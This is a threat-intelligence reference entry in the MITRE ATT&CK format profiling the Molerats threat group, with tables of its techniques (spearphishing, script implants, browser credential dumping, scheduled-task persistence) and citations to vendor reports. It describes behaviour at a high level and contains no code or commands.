G0021 Molerats
Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.1234
| Item | Value |
|---|---|
| ID | G0021 |
| Associated Names | Operation Molerats, Gaza Cybergang |
| Version | 2.0 |
| Created | 31 May 2017 |
| Last Modified | 27 April 2021 |
| Navigation Layer | View In ATT&CK® Navigator |
Associated Group Descriptions
| Name | Description |
|---|---|
| Operation Molerats | 54 |
| Gaza Cybergang | 134 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Molerats saved malicious files within the AppData and Startup folders to maintain persistence.3 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Molerats used PowerShell implants on target machines.3 |
| enterprise | T1059.005 | Visual Basic | Molerats used various implants, including those built with VBScript, on target machines.36 |
| enterprise | T1059.007 | JavaScript | Molerats used various implants, including those built with JS, on target machines.3 |
| enterprise | T1555 | Credentials from Password Stores | - |
| enterprise | T1555.003 | Credentials from Web Browsers | Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.1 |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Molerats decompresses ZIP files once on the victim machine.3 |
| enterprise | T1105 | Ingress Tool Transfer | Molerats used executables to download malicious files from different sources.36 |
| enterprise | T1027 | Obfuscated Files or Information | Molerats has delivered compressed executables within ZIP files to victims.3 |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.001 | Spearphishing Attachment | Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.364 |
| enterprise | T1566.002 | Spearphishing Link | Molerats has sent phishing emails with malicious links included.3 |
| enterprise | T1057 | Process Discovery | Molerats actors obtained a list of active processes on the victim and sent them to C2 servers.1 |
| enterprise | T1053 | Scheduled Task/Job | - |
| enterprise | T1053.005 | Scheduled Task | Molerats has created scheduled tasks to persistently run VBScripts.6 |
| enterprise | T1553 | Subvert Trust Controls | - |
| enterprise | T1553.002 | Code Signing | Molerats has used forged Microsoft code-signing certificates on malware.5 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.007 | Msiexec | Molerats has used msiexec.exe to execute an MSI payload.6 |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.001 | Malicious Link | Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.36 |
| enterprise | T1204.002 | Malicious File | Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.364 |
Software
References
-
ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016. ↩↩↩↩↩↩
-
ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016. ↩↩↩
-
GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020. ↩↩↩↩↩↩↩↩↩
-
Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016. ↩↩↩
-
Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020. ↩↩↩↩↩↩↩↩